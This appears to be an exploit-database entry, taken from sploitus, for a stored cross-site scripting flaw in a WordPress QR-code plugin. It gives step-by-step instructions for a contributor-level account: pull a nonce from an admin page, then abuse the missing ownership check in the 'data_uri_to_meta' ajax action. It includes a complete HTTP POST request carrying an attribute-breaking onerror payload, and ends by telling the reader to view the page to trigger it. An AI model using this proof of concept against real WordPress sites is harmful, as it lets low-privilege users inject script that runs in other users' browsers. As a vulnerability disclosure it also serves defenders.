## https://sploitus.com/exploit?id=WPEX-ID:65A29976-163A-4BBF-A4E8-590DDC4B83F2
To exploit this vulnerability the attacker should have access, at least, to an account with the capability 'edit_posts'. ( Eg. contributor ). This is required to obtain a nonce, which is used to protect the affected ajax function.
To obtain the nonce, the attacker calls: "<your host here>/wp-admin/edit.php?post_type=qr". The nonce now lays in a script with the id "qyrr-admin-js-extra".
Inside the script, the exploitable qr-posts are listed (post_id is the id of post meta data with the meta key 'data-uri' ). There is no check, if the requesting user is the owner of that qr post.
The third required parameter is data-uri. This param will contain the stored javascript. On request-processing data-uri will be sanitized by sanitize_text_field but will not be escaped when output in the src attribute of the QR Code Image
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 94
Connection: close
Cookie: [contributor+]
action=data_uri_to_meta&nonce=d5c0a0e3fa&post_id=1238&data-uri=+%22+onerror%3Dalert(1)+e%3D%22
Then access the page/post where the QR Code is embed to trigger the XSS